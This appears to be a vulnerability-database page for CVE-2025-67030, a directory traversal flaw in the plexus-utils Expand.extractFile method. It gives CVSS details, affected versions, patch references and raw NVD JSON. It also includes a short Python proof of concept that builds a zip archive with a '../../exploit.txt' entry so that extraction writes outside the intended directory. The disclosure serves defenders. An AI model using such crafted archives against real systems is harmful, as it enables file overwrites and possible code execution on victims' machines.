Security Vulnerability Report
中文
CVE-2025-67030 CVSS 8.8 HIGH

CVE-2025-67030

Published: 2026-03-25 18:16:26
Last Modified: 2026-05-01 17:12:23

Description

Directory Traversal vulnerability in the extractFile method of org.codehaus.plexus.util.Expand in plexus-utils before 6d780b3378829318ba5c2d29547e0012d5b29642. This allows an attacker to execute arbitrary code

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:codehaus-plexus:plexus-utils:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:codehaus-plexus:plexus-utils:*:*:*:*:*:*:*:* - VULNERABLE
plexus-utils < commit 6d780b3378829318ba5c2d29547e0012d5b29642

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import zipfile import os # PoC for CVE-2025-67030 # This script generates a malicious zip file containing a path traversal entry. # The file to be created outside the extraction directory malicious_content = b"This is a test file for CVE-2025-67030" # Create a zip file with zipfile.ZipFile('cve_2025_67030_poc.zip', 'w') as zf: # Use "../" to escape the extraction directory # This will attempt to write 'exploit.txt' to the parent directory of where it is extracted zf.writestr('../../exploit.txt', malicious_content) print("Malicious zip file created: cve_2025_67030_poc.zip") print("When extracted, it will write to ../../exploit.txt")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67030", "sourceIdentifier": "[email protected]", "published": "2026-03-25T18:16:25.880", "lastModified": "2026-05-01T17:12:22.820", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Directory Traversal vulnerability in the extractFile method of org.codehaus.plexus.util.Expand in plexus-utils before 6d780b3378829318ba5c2d29547e0012d5b29642. This allows an attacker to execute arbitrary code"}, {"lang": "es", "value": "Vulnerabilidad de salto de directorio en el método extractFile de org.codehaus.plexus.util.Expand en plexus-utils anterior a 6d780b3378829318ba5c2d29547e0012d5b29642. Esto permite a un atacante ejecutar código arbitrario"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:codehaus-plexus:plexus-utils:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.6.1", "matchCriteriaId": "642FD06A-559F-4234-BCC3-63AFFD47A41C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:codehaus-plexus:plexus-utils:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.0.3", "matchCriteriaId": "29C552CC-D882-4EDF-AF4B-7AA02D7B70AE"}]}]}], "references": [{"url": "https://gist.github.com/weaver4VD/3216dac645220f8c9b488362f61241ec", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/codehaus-plexus/plexus-utils/commit/6d780b3378829318ba5c2d29547e0012d5b29642", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/codehaus-plexus/plexus-utils/issues/294", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/codehaus-plexus/plexus-utils/pull/295", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/codehaus-plexus/plexus-utils/pull/296", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}]}}